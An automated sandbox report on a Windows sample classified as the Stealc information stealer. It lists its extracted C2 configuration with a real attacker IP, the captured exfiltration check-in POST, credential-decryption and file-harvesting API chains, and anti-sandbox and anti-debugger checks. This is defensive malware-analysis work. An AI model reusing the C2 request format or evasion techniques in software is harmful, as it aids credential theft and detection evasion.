
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542683
MD5: 23f03176ddc56b4e531545aaf7394334
SHA1: 56dffc71067b0d3896a2fba82b320d8b7f18782e
SHA256: da968f12344c3ccfdfa40421c3688c1761a2ff5054b353582022016e0a05fbe4
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3184 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 23F03176DDC56B4E531545AAF7394334)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches (PCAP)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security | -

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -
00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -
00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -
Process Memory Space: file.exe PID: 3184 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | -
Process Memory Space: file.exe PID: 3184 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
0.2.file.exe.e90000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -

Sigma: No Sigma rule has matched

Suricata alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T07:11:01.630432+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49709 | 185.215.113.206 | 80 | TCP

                AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.e90000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: file.exe Virustotal: Detection: 44%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E9C820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E99AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E99AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E97240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E97240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E99B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E99B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00EA8EA0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EA38B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA4910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E9E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EA4570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E9ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E916D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EA3EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9DE10

                Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
  Host: 185.215.113.206
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
  Data Ascii:
    ------DGHJECAFIDAFHJKFCGHI
    Content-Disposition: form-data; name="hwid"

    C8E8AA84EA5B340779059
    ------DGHJECAFIDAFHJKFCGHI
    Content-Disposition: form-data; name="build"

    puma
    ------DGHJECAFIDAFHJKFCGHI--
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E94880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E94880
Source: unknown HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
  Host: 185.215.113.206
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
  Data Ascii:
    ------DGHJECAFIDAFHJKFCGHI
    Content-Disposition: form-data; name="hwid"

    C8E8AA84EA5B340779059
    ------DGHJECAFIDAFHJKFCGHI
    Content-Disposition: form-data; name="build"

    puma
    ------DGHJECAFIDAFHJKFCGHI--
Source: file.exe, 00000000.00000002.2175832040.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/3
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/M
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/D
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpt
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws

                System Summary

Source: file.exe Static PE information: section name: (empty)
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125990A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01263912
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125E826
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125488C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0113032F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0119BB7F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012563BA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125B3D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0124DA86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0124F5ED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01252C3F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0124BF92
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01163E11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011E2E08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125CE4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01257EBF
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00E945C0 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: nnbmymfp ZLIB complexity 0.9949252187786609
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00EA8680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00EA3720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\A37PY4PZ.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe Virustotal: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe Static file information: File size 1830912 > 1048576
Source: file.exe Static PE information: Raw size of nnbmymfp is bigger than: 0x100000 < 0x198e00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.e90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nnbmymfp:EW;onazwdcw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nnbmymfp:EW;onazwdcw:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA9860
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x1bf258 should be: 0x1c46fa
Source: file.exe Static PE information: section name: (empty)
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: (empty)
Source: file.exe Static PE information: section name: nnbmymfp
Source: file.exe Static PE information: section name: onazwdcw
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebp; mov dword ptr [esp], ecx 0_2_01251280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 57FEE43Ah; mov dword ptr [esp], eax 0_2_012512D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 4B699A9Bh; mov dword ptr [esp], edx 0_2_0125131F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 7E3607DAh; mov dword ptr [esp], esp 0_2_01251358
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 287BDF53h; mov dword ptr [esp], edx 0_2_01251396
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 233C371Fh; mov dword ptr [esp], edi 0_2_0125144D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push eax; mov dword ptr [esp], esp 0_2_01251451
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], eax 0_2_012514C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 76815C61h; mov dword ptr [esp], edx 0_2_012514D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], eax 0_2_012514FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edi; mov dword ptr [esp], 4FDC77ABh 0_2_01251507
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebp; mov dword ptr [esp], ebx 0_2_01251526
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 27ECCF0Fh; mov dword ptr [esp], eax 0_2_0125156D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], esp 0_2_012515E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 13B908A4h; mov dword ptr [esp], eax 0_2_01251611
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push eax; mov dword ptr [esp], edx 0_2_01251642
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], ecx 0_2_01251683
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebx; mov dword ptr [esp], eax 0_2_012516A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], 73F53585h 0_2_012516B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], 27171827h 0_2_012517CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 1B89CF73h; mov dword ptr [esp], edi 0_2_01251806
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], edi 0_2_01251840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], 751F2530h 0_2_01251844
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], 77C7069Bh 0_2_01251944
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebx; mov dword ptr [esp], ecx 0_2_012519C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], edi 0_2_01251A3F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], edx 0_2_01251AB3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 6C1E87B1h; mov dword ptr [esp], eax 0_2_01251ACD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebp; mov dword ptr [esp], edx 0_2_01251BF1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], ebp 0_2_01251C2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], edi 0_2_01251C8C
Source: file.exe Static PE information: section name: nnbmymfp entropy: 7.953989385913713

                Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass (searched twice)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS (searched twice)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA9860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13601
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2342 second address: 10F2346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2346 second address: 10F234C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F234C second address: 10F2350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263430 second address: 1263436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267854 second address: 126785A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126785A second address: 126787B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F849C4F2D96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126787B second address: 1267881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267E8B second address: 1267E9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267E9C second address: 1267EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4206h 0x00000009 jmp 00007F849CDA4204h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F849CDA4202h 0x00000019 jns 00007F849CDA41F8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268066 second address: 1268084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F849C4F2DA1h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268084 second address: 1268088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268088 second address: 1268094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268094 second address: 126809C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126809C second address: 12680A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12680A1 second address: 12680B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 jns 00007F849CDA41FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B412 second address: 126B418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
